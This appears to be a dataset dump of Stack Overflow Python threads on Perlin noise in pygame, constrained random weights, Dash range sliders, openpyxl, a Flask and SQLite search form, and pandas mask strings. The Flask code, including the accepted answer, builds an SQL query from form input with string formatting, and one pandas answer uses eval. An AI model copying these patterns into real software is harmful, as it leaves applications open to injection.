#run the game class pygame.display.update() pygame.quit() quit() A: I recommend installing the noise package. Then use noise.pnoise1(x) for 1 dimensional Perlin noise, noise.pnoise2(x, y) for 2 dimensional Perlin noise, and noise.pnoise3(x, y, z) for 3 dimensional Perlin noise. A: First, the critical thinking: Perlin is a popular term but the actual "Perlin" noise algorithm is old and visibly square-aligned. Better, as a general rule, to use a Simplex-type noise. I suggest PyFastNoiseLite: https://github.com/tizilogic/PyFastNoiseLite Follow the install instructions, then mirror the C++ example in the FastNoiseLite documentation here: https://github.com/Auburn/FastNoiseLite/tree/master/Cpp Be sure to note its internal frequency multiplication, which you can change with SetFrequency(f) You can also use the Python noise library for Simplex-type noise, with noise snoise2(x, y) though if you wish to use snoise3(x, y, z) I would first consider the info here: https://www.reddit.com/r/proceduralgeneration/comments/qr6snt/countdown_timer_simplex_patent_expiration/
How to generate perlin noise in pygame?
I am trying to make a survival game and I have a problem with perlin noise. My program gives me this: But I want something like islands or rivers. Here's my code: #SetUp# import pygame, sys, random pygame.init() win = pygame.display.set_mode((800, 600)) pygame.display.set_caption('Isom') x = 0 y = 0 s = 0 tilel = list() random.seed(5843) MAP = [random.randint(0, 1) for _ in range(192)] #Tiles# class tile(): grass = pygame.image.load('Sprites/Images/Grass.png') water = pygame.image.load('Sprites/Images/Water.png') #Loop# while True: for key in pygame.event.get(): if key.type == pygame.QUIT: pygame.quit() sys.exit() #World# for a in range(12): for b in range(16): if MAP[s] == 0: win.blit((tile.grass), (x, y)) elif MAP[s] == 1: win.blit((tile.water), (x, y)) x += 50 s += 1 x = 0 y += 50 x = 0 y = 0 s = 0 #Update# pygame.display.update()
[ "image of randomly genrated terrain\ncode for perlin noise in pygame:\n from PIL import Image\n import numpy as np\n from perlin_noise import PerlinNoise\n import random\n import pygame\n pygame.init()\n\n noise = PerlinNoise(octaves=6, seed=random.randint(0, 100000))\n xpix, ypix = 500, 500\n pic = [[noise([i/xpix, j/ypix]) for j in range(xpix)] for i in range(ypix)]\n\n\n\n screen = pygame.display.set_mode ((500, 500), pygame.RESIZABLE)\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n run = False\n for i, row in enumerate(pic):\n for j, column in enumerate(row):\n if column>=0.6:\n pygame.draw.rect(screen, (250, 250, 250), pygame.Rect(j, i, 1, 1))\n elif column>=0.2:\n pygame.draw.rect(screen, (80, 80, 80), pygame.Rect(j, i, 1, 1)) \n elif column>=0.09:\n pygame.draw.rect(screen, (30, 90, 30), pygame.Rect(j, i, 1, 1))\n elif column >=0.009:\n pygame.draw.rect(screen, (10, 100, 10), pygame.Rect(j, i, 1, 1))\n elif column >=0.002:\n pygame.draw.rect(screen, (100, 150, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.06:\n pygame.draw.rect(screen, (30, 190, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.02:\n pygame.draw.rect(screen, (40, 200, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.1:\n pygame.draw.rect(screen, (10, 210, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.8:\n pygame.draw.rect(screen, (0, 0, 200), pygame.Rect(j, i, 1, 1))\n\n #------------\n #run the game class\n\n pygame.display.update()\n pygame.quit()\n quit()\n\n\n \n\n", "I recommend installing the noise package. Then use noise.pnoise1(x) for 1 dimensional Perlin noise, noise.pnoise2(x, y) for 2 dimensional Perlin noise, and noise.pnoise3(x, y, z) for 3 dimensional Perlin noise.\n", "First, the critical thinking: Perlin is a popular term but the actual \"Perlin\" noise algorithm is old and visibly square-aligned. Better, as a general rule, to use a Simplex-type noise.\nI suggest PyFastNoiseLite: https://github.com/tizilogic/PyFastNoiseLite Follow the install instructions, then mirror the C++ example in the FastNoiseLite documentation here: https://github.com/Auburn/FastNoiseLite/tree/master/Cpp Be sure to note its internal frequency multiplication, which you can change with SetFrequency(f)\nYou can also use the Python noise library for Simplex-type noise, with noise snoise2(x, y) though if you wish to use snoise3(x, y, z) I would first consider the info here: https://www.reddit.com/r/proceduralgeneration/comments/qr6snt/countdown_timer_simplex_patent_expiration/\n" ]
[ 1, 0, 0 ]
[]
[]
[ "perlin_noise", "pygame", "python" ]
stackoverflow_0070084741_perlin_noise_pygame_python.txt
Q: What is the most efficient way to generate a list of random numbers all within a range that have a fixed sum so that their boundaries are approached? I am trying to generate a list of 12 random weights for a stock portfolio in order to determine how the portfolio would have performed in the past given different weights assigned to each stock. The sum of the weights must of course be 1 and there is an additional restriction: each stock must have a weight between 1/24 and 1/4. Although I am able to generate random numbers such that they all fall within the interval by using random.uniform(), as well as guarantee their sum is 1 by dividing each weighting by the sum of the weightings, I'm finding that a) each subsequent array of weightings is very similar. I am rarely getting values for weightings that are near the upper boundary of 1/4 b) random.seed() does not seem to be working properly, whether I put it in the randweight() function or at the beginning of the for loop. I'm confused as to why because I thought that generating a random seed value would make my array of weights unique for each iteration. Currently, it's cyclical, with a period of 3. The following is my code: # boundaries on weightings n = 12 min_weight = (1/(2*n)) max_weight = 25 / 100 def rand_weight(e): random.seed() return e + np.random.uniform(min_weight, max_weight) for i in range(100): weights = np.empty(12) while not (np.all(weights > min_weight) and np.all(weights < max_weight)): weights = np.array(list(map(rand_weight, weights))) weights /= np.sum(weights) I have already tried scattering the weights by changing the min_weight and max_weight inside the for loop so that rand_weight generates newer values, but this makes the runtime really slow because the "not" condition in the while loop takes longer to evaluate to false (since the probability of all the numbers being in the range decreases). A: The following works. Particularly confusing to me is that np.empty(12) seemed to always return the same array. So once it had been initialized, it stayed the same. This seems to produce numbers above 0.22 reasonably often. import numpy as np from random import random, seed # boundaries on weightings n = 12 min_weight = (1/(2*n)) max_weight = 25 / 100 seed(666) for i in range(100): weights = np.zeros(n) while not (np.all(weights > min_weight) and np.all(weights < max_weight)): weights = np.array([random() for _ in range(n)]) weights /= np.sum(weights) - min_weight * n weights += min_weight print(weights) A: Lets start with simple facts first. If you want numbers to be in the range [0.042...0.25] and 12 iid numbers in total summed to one, then for mean value Sum(Xi)=1 E[Sum(Xi)]=Sum(E[Xi])=N E[Xi] = 1 E[Xi]=1/N = 1/12 = 0.083 One corollary is that it would be hard to get numbers close to upper range boundary. And instead doing things like sampling whatever and then normalizing to get sum to 1, better to use known distribution where sum of values is 1 to begin with. So lets use Dirichlet distribution, and sample points uniformly in simplex, which means alpha (concentration) vector is all ones. import numpy as np N = 12 s = np.random.dirichlet(N*[1.0], 1) print(np.sum(s)) Some value would be larger (or smaller), and you could reject them def sampleWeights(alpha, lo, hi): while True: s = np.random.dirichlet(alpha, 1)[0] if np.any(s > hi): continue # reject if np.any(s < lo): continue # reject return s # accept and call it like this N=12 alpha = N*[1.0] q = sampleWeights(alpha, 1./24., 1./4.) if you could check it, a lot of rejections happens at low bound, rather then high bound. BEauty of using known Dirichlet distribution is that you could "concentrate" sampled values around mean, e.g. alpha = N*[10.0] q = sampleWeights(alpha, 1./24., 1./4.) will produce same iid with mean of 1/12 but a lot smaller std.deviation, RV a lot more concentrated around mean And if you want non-identically distributed RVs, use different alphas alpha = [1.,2.,3.,4.,5.,6.,6.,5.,4.,3.,2.,1.] q = sampleWeights(alpha, 1./24., 1./4.) then some of RVs would be close to upper boundary, and some close to lower boundary. Lots of advantages to use known distribution
What is the most efficient way to generate a list of random numbers all within a range that have a fixed sum so that their boundaries are approached?
I am trying to generate a list of 12 random weights for a stock portfolio in order to determine how the portfolio would have performed in the past given different weights assigned to each stock. The sum of the weights must of course be 1 and there is an additional restriction: each stock must have a weight between 1/24 and 1/4. Although I am able to generate random numbers such that they all fall within the interval by using random.uniform(), as well as guarantee their sum is 1 by dividing each weighting by the sum of the weightings, I'm finding that a) each subsequent array of weightings is very similar. I am rarely getting values for weightings that are near the upper boundary of 1/4 b) random.seed() does not seem to be working properly, whether I put it in the randweight() function or at the beginning of the for loop. I'm confused as to why because I thought that generating a random seed value would make my array of weights unique for each iteration. Currently, it's cyclical, with a period of 3. The following is my code: # boundaries on weightings n = 12 min_weight = (1/(2*n)) max_weight = 25 / 100 def rand_weight(e): random.seed() return e + np.random.uniform(min_weight, max_weight) for i in range(100): weights = np.empty(12) while not (np.all(weights > min_weight) and np.all(weights < max_weight)): weights = np.array(list(map(rand_weight, weights))) weights /= np.sum(weights) I have already tried scattering the weights by changing the min_weight and max_weight inside the for loop so that rand_weight generates newer values, but this makes the runtime really slow because the "not" condition in the while loop takes longer to evaluate to false (since the probability of all the numbers being in the range decreases).
[ "The following works. Particularly confusing to me is that np.empty(12) seemed to always return the same array. So once it had been initialized, it stayed the same.\nThis seems to produce numbers above 0.22 reasonably often.\nimport numpy as np\nfrom random import random, seed\n\n# boundaries on weightings\nn = 12\nmin_weight = (1/(2*n))\nmax_weight = 25 / 100\n\nseed(666)\nfor i in range(100):\n weights = np.zeros(n)\n while not (np.all(weights > min_weight) and np.all(weights < max_weight)):\n weights = np.array([random() for _ in range(n)])\n weights /= np.sum(weights) - min_weight * n\n weights += min_weight\n print(weights)\n\n", "Lets start with simple facts first. If you want numbers to be in the range [0.042...0.25] and 12 iid numbers in total summed to one, then for mean value\nSum(Xi)=1\nE[Sum(Xi)]=Sum(E[Xi])=N E[Xi] = 1\nE[Xi]=1/N = 1/12 = 0.083\nOne corollary is that it would be hard to get numbers close to upper range boundary.\nAnd instead doing things like sampling whatever and then normalizing to get sum to 1, better to use known distribution where sum of values is 1 to begin with.\nSo lets use Dirichlet distribution, and sample points uniformly in simplex, which means alpha (concentration) vector is all ones.\nimport numpy as np\n\nN = 12\ns = np.random.dirichlet(N*[1.0], 1)\nprint(np.sum(s))\n\nSome value would be larger (or smaller), and you could reject them\ndef sampleWeights(alpha, lo, hi):\n while True:\n s = np.random.dirichlet(alpha, 1)[0]\n if np.any(s > hi):\n continue # reject\n if np.any(s < lo):\n continue # reject\n return s # accept\n\nand call it like this\nN=12\nalpha = N*[1.0]\nq = sampleWeights(alpha, 1./24., 1./4.)\n\nif you could check it, a lot of rejections happens at low bound, rather then high bound.\nBEauty of using known Dirichlet distribution is that you could \"concentrate\" sampled values around mean, e.g.\nalpha = N*[10.0]\nq = sampleWeights(alpha, 1./24., 1./4.)\n\nwill produce same iid with mean of 1/12 but a lot smaller std.deviation, RV a lot more concentrated around mean\nAnd if you want non-identically distributed RVs, use different alphas\nalpha = [1.,2.,3.,4.,5.,6.,6.,5.,4.,3.,2.,1.]\nq = sampleWeights(alpha, 1./24., 1./4.)\n\nthen some of RVs would be close to upper boundary, and some close to lower boundary. Lots of advantages to use known distribution\n" ]
[ 0, 0 ]
[]
[]
[ "algorithm", "numpy", "python", "random", "random_seed" ]
stackoverflow_0074573355_algorithm_numpy_python_random_random_seed.txt
Q: Dash Choosing an ID and then Make Plot with Multiple Sliders I have a dataset which is similar to below one. Please note that there are multiple values for a single ID. import pandas as pd import numpy as np import random df = pd.DataFrame({'DATE_TIME':pd.date_range('2022-11-01', '2022-11-05 23:00:00',freq='20min'), 'SBP':[random.uniform(110, 160) for n in range(358)], 'DBP':[random.uniform(60, 100) for n in range(358)], 'ID':[random.randrange(1, 3) for n in range(358)], 'TIMEINTERVAL':[random.randrange(1, 200) for n in range(358)]}) df['VISIT'] = df['DATE_TIME'].dt.day df['MODE'] = np.select([df['VISIT']==1, df['VISIT'].isin([2,3])], ['CKD', 'Dialysis'], 'Late TPL') df['TIME'] = df['DATE_TIME'].dt.time df['TIME'] = df['TIME'].astype('str') def to_day_period(s): bins = ['0', '06:00:00', '13:00:00', '18:00:00', '23:00:00', '24:00:00'] labels = ['Night', 'Morning', 'Afternoon', 'Evening', 'Night'] return pd.cut( pd.to_timedelta(s), bins=list(map(pd.Timedelta, bins)), labels=labels, right=False, ordered=False ) df['TIME_OF_DAY'] = to_day_period(df['TIME']) I would like to use Dash so that I can firstly choose the ID, and then make a plot of that chosen ID. Besides, I made a slider to choose the time interval between measurements in terms of minutes. This slider should work for Morning and Night values separately. So, I have already implemented a slider which works for all day and night times. I would like to have two sliders, one for Morning values from 06:00 until 17:59, and other one called Night from 18 until 05:59. from dash import Dash, html, dcc, Input, Output import pandas as pd import os import plotly.express as px # FUNCTION TO CHOOSE A SINGLE PATIENT def choose_patient(dataframe_name, id_number): return dataframe_name[dataframe_name['ID']==id_number] # FUNCTION TO CHOOSE A SINGLE PATIENT WITH A SINGLE VISIT def choose_patient_visit(dataframe_name, id_number,visit_number): return dataframe_name[(dataframe_name['ID']==id_number) & (dataframe_name['VISIT']==visit_number)] # READING THE DATA df = pd.read_csv(df,sep=',',parse_dates=['DATE_TIME','DATE'], infer_datetime_format=True) # ---------------------------------------------------- dash example ---------------------------------------------------- app = Dash(__name__) app.layout = html.Div([ html.H4('Interactive Scatter Plot'), dcc.Graph(id="scatter-plot",style={'width': '130vh', 'height': '80vh'}), html.P("Filter by time interval:"), dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID, dcc.RangeSlider( id='range-slider', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), html.Div(id='dd-output-container') ]) @app.callback( Output("scatter-plot", "figure"), Input("pandas-dropdown-1", "value"), Input("range-slider", "value"), prevent_initial_call=True) def update_lineplot(value, slider_range): low, high = slider_range df1 = df.query("ID == @value & TIMEINTERVAL >= @low & TIMEINTERVAL < @high").copy() if df1.shape[0] != 0: fig = px.line(df1, x="DATE_TIME", y=["SBP", "DBP"], hover_data=['TIMEINTERVAL'], facet_col='VISIT', facet_col_wrap=2, symbol='MODE', facet_row_spacing=0.1, facet_col_spacing=0.09) fig.update_xaxes(matches=None, showticklabels=True) return fig else: return dash.no_update app.run_server(debug=True, use_reloader=False) How can I implement such two sliders? One slider should work for Night values of TIME_OF_DAY column and another one for Morning values of TIME_OF_DAY column. I look at Dash website, but there is no such tool available. A: The solution below only requires vey minor modifications to your example code. It essentially filters the original dataframe twice (once for TIME_OF_DAY='Night', and once for TIME_OF_DAY='Morning') and concatenates them before plotting. I've also modified the bins in the to_day_period function to only produce two labels that match the request in the text ("Morning values from 06:00 until 17:59, and [...] Night from 18 until 05:59."), but the dash code can similarily be used for more categories. bins = ['0', '06:00:00', '18:00:00', '24:00:00'] labels = ['Night', 'Morning', 'Night'] Dash code app = Dash(__name__) app.layout = html.Div([ html.H4('Interactive Scatter Plot with ABPM dataset'), html.P("Select ID:"), dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID, html.P("Filter by time interval during nighttime (18:00-6:00):"), dcc.RangeSlider( id='range-slider-night', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), html.P("Filter by time interval during daytime (6:00-18:00):"), dcc.RangeSlider( id='range-slider-morning', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), dcc.Graph(id="scatter-plot", style={'width': '130vh', 'height': '80vh'}), html.Div(id='dd-output-container') ]) @app.callback( Output("scatter-plot", "figure"), Input("pandas-dropdown-1", "value"), Input("range-slider-night", "value"), Input("range-slider-morning", "value"), prevent_initial_call=True) def update_lineplot(value, slider_range_night, slider_range_morning): low_night, high_night = slider_range_night low_morning, high_morning = slider_range_morning df_night = df.query("ID == @value & TIME_OF_DAY == 'Night' & TIMEINTERVAL >= @low_night & TIMEINTERVAL < @high_night").copy() df_morning = df.query("ID == @value & TIME_OF_DAY == 'Morning' & TIMEINTERVAL >= @low_morning & TIMEINTERVAL < @high_morning").copy() df1 = pd.concat([df_night, df_morning], axis=0).sort_values(['TIME']) if df1.shape[0] != 0: fig = px.line(df1, x="DATE_TIME", y=["SBP", "DBP"], hover_data=['TIMEINTERVAL'], facet_col='VISIT', facet_col_wrap=2, symbol='MODE', facet_row_spacing=0.1, facet_col_spacing=0.09) fig.update_xaxes(matches=None, showticklabels=True) return fig else: return no_update app.run_server(debug=True, use_reloader=False) Application In the screenshot below, all the "Morning"/"Daytime" observations have been filtered for TIMEINTERVAL, while the "Night" observations remain unaffected:
Dash Choosing an ID and then Make Plot with Multiple Sliders
I have a dataset which is similar to below one. Please note that there are multiple values for a single ID. import pandas as pd import numpy as np import random df = pd.DataFrame({'DATE_TIME':pd.date_range('2022-11-01', '2022-11-05 23:00:00',freq='20min'), 'SBP':[random.uniform(110, 160) for n in range(358)], 'DBP':[random.uniform(60, 100) for n in range(358)], 'ID':[random.randrange(1, 3) for n in range(358)], 'TIMEINTERVAL':[random.randrange(1, 200) for n in range(358)]}) df['VISIT'] = df['DATE_TIME'].dt.day df['MODE'] = np.select([df['VISIT']==1, df['VISIT'].isin([2,3])], ['CKD', 'Dialysis'], 'Late TPL') df['TIME'] = df['DATE_TIME'].dt.time df['TIME'] = df['TIME'].astype('str') def to_day_period(s): bins = ['0', '06:00:00', '13:00:00', '18:00:00', '23:00:00', '24:00:00'] labels = ['Night', 'Morning', 'Afternoon', 'Evening', 'Night'] return pd.cut( pd.to_timedelta(s), bins=list(map(pd.Timedelta, bins)), labels=labels, right=False, ordered=False ) df['TIME_OF_DAY'] = to_day_period(df['TIME']) I would like to use Dash so that I can firstly choose the ID, and then make a plot of that chosen ID. Besides, I made a slider to choose the time interval between measurements in terms of minutes. This slider should work for Morning and Night values separately. So, I have already implemented a slider which works for all day and night times. I would like to have two sliders, one for Morning values from 06:00 until 17:59, and other one called Night from 18 until 05:59. from dash import Dash, html, dcc, Input, Output import pandas as pd import os import plotly.express as px # FUNCTION TO CHOOSE A SINGLE PATIENT def choose_patient(dataframe_name, id_number): return dataframe_name[dataframe_name['ID']==id_number] # FUNCTION TO CHOOSE A SINGLE PATIENT WITH A SINGLE VISIT def choose_patient_visit(dataframe_name, id_number,visit_number): return dataframe_name[(dataframe_name['ID']==id_number) & (dataframe_name['VISIT']==visit_number)] # READING THE DATA df = pd.read_csv(df,sep=',',parse_dates=['DATE_TIME','DATE'], infer_datetime_format=True) # ---------------------------------------------------- dash example ---------------------------------------------------- app = Dash(__name__) app.layout = html.Div([ html.H4('Interactive Scatter Plot'), dcc.Graph(id="scatter-plot",style={'width': '130vh', 'height': '80vh'}), html.P("Filter by time interval:"), dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID, dcc.RangeSlider( id='range-slider', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), html.Div(id='dd-output-container') ]) @app.callback( Output("scatter-plot", "figure"), Input("pandas-dropdown-1", "value"), Input("range-slider", "value"), prevent_initial_call=True) def update_lineplot(value, slider_range): low, high = slider_range df1 = df.query("ID == @value & TIMEINTERVAL >= @low & TIMEINTERVAL < @high").copy() if df1.shape[0] != 0: fig = px.line(df1, x="DATE_TIME", y=["SBP", "DBP"], hover_data=['TIMEINTERVAL'], facet_col='VISIT', facet_col_wrap=2, symbol='MODE', facet_row_spacing=0.1, facet_col_spacing=0.09) fig.update_xaxes(matches=None, showticklabels=True) return fig else: return dash.no_update app.run_server(debug=True, use_reloader=False) How can I implement such two sliders? One slider should work for Night values of TIME_OF_DAY column and another one for Morning values of TIME_OF_DAY column. I look at Dash website, but there is no such tool available.
[ "The solution below only requires vey minor modifications to your example code. It essentially filters the original dataframe twice (once for TIME_OF_DAY='Night', and once for TIME_OF_DAY='Morning') and concatenates them before plotting.\nI've also modified the bins in the to_day_period function to only produce two labels that match the request in the text (\"Morning values from 06:00 until 17:59, and [...] Night from 18 until 05:59.\"), but the dash code can similarily be used for more categories.\n bins = ['0', '06:00:00', '18:00:00', '24:00:00']\n labels = ['Night', 'Morning', 'Night']\n\nDash code\napp = Dash(__name__)\n\napp.layout = html.Div([\n html.H4('Interactive Scatter Plot with ABPM dataset'),\n html.P(\"Select ID:\"),\n dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID,\n html.P(\"Filter by time interval during nighttime (18:00-6:00):\"),\n dcc.RangeSlider(\n id='range-slider-night',\n min=0, max=600, step=10,\n marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400',\n 450: '450', 500: '500', 550: '550', 600: '600'},\n value=[0, 600]\n ),\n html.P(\"Filter by time interval during daytime (6:00-18:00):\"),\n dcc.RangeSlider(\n id='range-slider-morning',\n min=0, max=600, step=10,\n marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400',\n 450: '450', 500: '500', 550: '550', 600: '600'},\n value=[0, 600]\n ),\n dcc.Graph(id=\"scatter-plot\", style={'width': '130vh', 'height': '80vh'}),\n html.Div(id='dd-output-container')\n])\n\n\n@app.callback(\n Output(\"scatter-plot\", \"figure\"),\n Input(\"pandas-dropdown-1\", \"value\"),\n Input(\"range-slider-night\", \"value\"),\n Input(\"range-slider-morning\", \"value\"),\n prevent_initial_call=True)\n\ndef update_lineplot(value, slider_range_night, slider_range_morning):\n low_night, high_night = slider_range_night\n low_morning, high_morning = slider_range_morning\n df_night = df.query(\"ID == @value & TIME_OF_DAY == 'Night' & TIMEINTERVAL >= @low_night & TIMEINTERVAL < @high_night\").copy()\n df_morning = df.query(\"ID == @value & TIME_OF_DAY == 'Morning' & TIMEINTERVAL >= @low_morning & TIMEINTERVAL < @high_morning\").copy()\n df1 = pd.concat([df_night, df_morning], axis=0).sort_values(['TIME'])\n\n if df1.shape[0] != 0:\n fig = px.line(df1, x=\"DATE_TIME\", y=[\"SBP\", \"DBP\"],\n hover_data=['TIMEINTERVAL'], facet_col='VISIT',\n facet_col_wrap=2,\n symbol='MODE',\n facet_row_spacing=0.1,\n facet_col_spacing=0.09)\n\n fig.update_xaxes(matches=None, showticklabels=True)\n\n return fig\n else:\n return no_update\n\napp.run_server(debug=True, use_reloader=False)\n\nApplication\nIn the screenshot below, all the \"Morning\"/\"Daytime\" observations have been filtered for TIMEINTERVAL, while the \"Night\" observations remain unaffected:\n\n" ]
[ 1 ]
[]
[]
[ "plotly", "plotly_dash", "python" ]
stackoverflow_0074448717_plotly_plotly_dash_python.txt
Q: Why do I get this "sheet" not found error? import openpyxl as rp ton1 = rp.load_workbook("transactions.xlsx") gol = ton1["Sheet1"] joi = sheet["a1"] print(joi.value) Following mosh course ...stuck with this...need help A: The error NameError: name 'sheet' is not defined is legit. If you want to read from an Excel spreadsheet in python/openpyxl, you need to define it first and in your case, that is gol. You can try this : import openpyxl as rp ton1 = rp.load_workbook("transactions.xlsx") gol = ton1["Sheet1"] joi = gol["A1"] # instead of sheet["a1"] print(joi.value) Read more here about openpyxl.
Why do I get this "sheet" not found error?
import openpyxl as rp ton1 = rp.load_workbook("transactions.xlsx") gol = ton1["Sheet1"] joi = sheet["a1"] print(joi.value) Following mosh course ...stuck with this...need help
[ "The error NameError: name 'sheet' is not defined is legit. If you want to read from an Excel spreadsheet in python/openpyxl, you need to define it first and in your case, that is gol.\nYou can try this :\nimport openpyxl as rp\n\nton1 = rp.load_workbook(\"transactions.xlsx\")\n\ngol = ton1[\"Sheet1\"]\n\njoi = gol[\"A1\"] # instead of sheet[\"a1\"]\n\nprint(joi.value)\n\nRead more here about openpyxl.\n" ]
[ 0 ]
[]
[]
[ "nameerror", "openpyxl", "python" ]
stackoverflow_0074592073_nameerror_openpyxl_python.txt
Q: BadRequestKeyError werkzeug.exceptions.BadRequestKeyError: KeyError: 'nume_pacient' I want to get the text from my input with name="nume_pacient" when pressing the button, to pass it to python code and use it in a query in a database; I want the results to be loaded in the same page. HTML PAGE: {% extends "base.html" %} {% block title %}Home{% endblock %} {%block content %} <h1>This is the home page</h1> <br> <button><a href="/populare/">Populare</a></button> <button><a href="/pacienti/">Afisare Pacienti</a></button> <button><a href="/retete/">Afisare Retete</a></button> <button><a href="/internari/">Afisare Internari</a></button> <button><a href="/medici/">Afisare Medici</a></button> <button><a href="/departamente/">Afisare Departamente</a></button> {% for row in rows %} <p> {% for x in row %} {{x}} {% endfor %} </p> {% endfor %} <form method="POST"> <input type="text" name="nume_pacient"> <button><a href="/pacienti/cautare">Cautare Pacient</a> </button> </form> {%endblock%} PYTHON CODE: @auth.route('/pacienti/cautare',methods=["GET","POST"]) def cautarePacient(): if request.method == 'GET': numeCautare=request.form['nume_pacient'] print(numeCautare) connection=sqlite3.connect('database.db') cursor=connection.cursor() cursor.execute("SELECT * FROM pacient WHERE nume='{{x}}'".format(x=numeCautare)) rows=cursor.fetchall() for row in rows: print(row) connection.commit() return render_template("home.html",user=current_user,rows=rows) return '',204 I tried using request.method == 'POST' I tried using request.form.get('nume_pacient') A: Don't add a tags inside buttons (not only in form but everywhere), provide action attribute to form: <form method="POST" action="/pacienti/cautare"> <input type="text" name="nume_pacient"> <button type="submit">Cautare Pacient</button> </form> Then in your python code you need to get data sent by POST request, so: @auth.route('/pacienti/cautare',methods=["GET","POST"]) def cautarePacient(): if request.method == 'POST': numeCautare=request.form['nume_pacient'] print(numeCautare) connection=sqlite3.connect('database.db') cursor=connection.cursor() cursor.execute("SELECT * FROM pacient WHERE nume='{{x}}'".format(x=numeCautare)) rows=cursor.fetchall() # you don't need to commit after SELECT return render_template("home.html",user=current_user,rows=rows) return '',204
BadRequestKeyError werkzeug.exceptions.BadRequestKeyError: KeyError: 'nume_pacient'
I want to get the text from my input with name="nume_pacient" when pressing the button, to pass it to python code and use it in a query in a database; I want the results to be loaded in the same page. HTML PAGE: {% extends "base.html" %} {% block title %}Home{% endblock %} {%block content %} <h1>This is the home page</h1> <br> <button><a href="/populare/">Populare</a></button> <button><a href="/pacienti/">Afisare Pacienti</a></button> <button><a href="/retete/">Afisare Retete</a></button> <button><a href="/internari/">Afisare Internari</a></button> <button><a href="/medici/">Afisare Medici</a></button> <button><a href="/departamente/">Afisare Departamente</a></button> {% for row in rows %} <p> {% for x in row %} {{x}} {% endfor %} </p> {% endfor %} <form method="POST"> <input type="text" name="nume_pacient"> <button><a href="/pacienti/cautare">Cautare Pacient</a> </button> </form> {%endblock%} PYTHON CODE: @auth.route('/pacienti/cautare',methods=["GET","POST"]) def cautarePacient(): if request.method == 'GET': numeCautare=request.form['nume_pacient'] print(numeCautare) connection=sqlite3.connect('database.db') cursor=connection.cursor() cursor.execute("SELECT * FROM pacient WHERE nume='{{x}}'".format(x=numeCautare)) rows=cursor.fetchall() for row in rows: print(row) connection.commit() return render_template("home.html",user=current_user,rows=rows) return '',204 I tried using request.method == 'POST' I tried using request.form.get('nume_pacient')
[ "Don't add a tags inside buttons (not only in form but everywhere), provide action attribute to form:\n<form method=\"POST\" action=\"/pacienti/cautare\">\n <input type=\"text\" name=\"nume_pacient\">\n <button type=\"submit\">Cautare Pacient</button>\n</form> \n\nThen in your python code you need to get data sent by POST request, so:\n@auth.route('/pacienti/cautare',methods=[\"GET\",\"POST\"])\ndef cautarePacient():\n if request.method == 'POST':\n numeCautare=request.form['nume_pacient']\n print(numeCautare)\n connection=sqlite3.connect('database.db')\n cursor=connection.cursor()\n cursor.execute(\"SELECT * FROM pacient WHERE nume='{{x}}'\".format(x=numeCautare))\n rows=cursor.fetchall()\n # you don't need to commit after SELECT\n return render_template(\"home.html\",user=current_user,rows=rows)\n return '',204\n\n" ]
[ 0 ]
[]
[]
[ "api", "flask", "html", "post", "python" ]
stackoverflow_0074591157_api_flask_html_post_python.txt
Q: Access pandas masks in a dictionary I have a dictionary containing several pandas masks as strings for a specific dataframe, but I can't find a way to use those masks. Here is a short reproducible example : df = pd.DataFrame({'age' : [10, 24, 35, 67], 'strength' : [0 , 3, 9, 4]}) masks = {'old_strong' : "(df['age'] >18) & (df['strength'] >5)", 'young_weak' : "(df['age'] <18) & (df['strength'] <5)"} And I would like to do something like : df[masks['young_weak']] But since the mask is a string I get the error KeyError: "(df['age'] <18) & (df['strength] <5)" A: Use DataFrame.query with changed dictionary: masks = {'old_strong' : "(age >18) & (strength >5)", 'young_weak' : "(age <18) & (strength <5)"} print (df.query(masks['young_weak'])) age strength 0 10 0 A: Another way is to set up the masks as functions (lambda expressions) instead of strings. This works: masks = {'old_strong' : lambda row: (row['age'] >18) & (row['strength'] >5), 'young_weak' : lambda row: (row['age'] <18) & (row['strength'] <5)} df[masks['young_weak']] A: If you're allowed to change the masks dictionary, the easiest way is to store filters and not strings like this: masks = { 'old_strong' : (df['age'] >18) & (df['strength'] >5), 'young_weak' : (df['age'] <18) & (df['strength'] <5) } Otherwise, keep the strings and use df.query(masks['yound_weak']). A: Unsafe solution though, and very bad practice, but the only way to solve it is to use eval: print(df[eval(masks['young_weak'])]) Output: age strength 0 10 0 Here is the link to the reason it's bad.
Access pandas masks in a dictionary
I have a dictionary containing several pandas masks as strings for a specific dataframe, but I can't find a way to use those masks. Here is a short reproducible example : df = pd.DataFrame({'age' : [10, 24, 35, 67], 'strength' : [0 , 3, 9, 4]}) masks = {'old_strong' : "(df['age'] >18) & (df['strength'] >5)", 'young_weak' : "(df['age'] <18) & (df['strength'] <5)"} And I would like to do something like : df[masks['young_weak']] But since the mask is a string I get the error KeyError: "(df['age'] <18) & (df['strength] <5)"
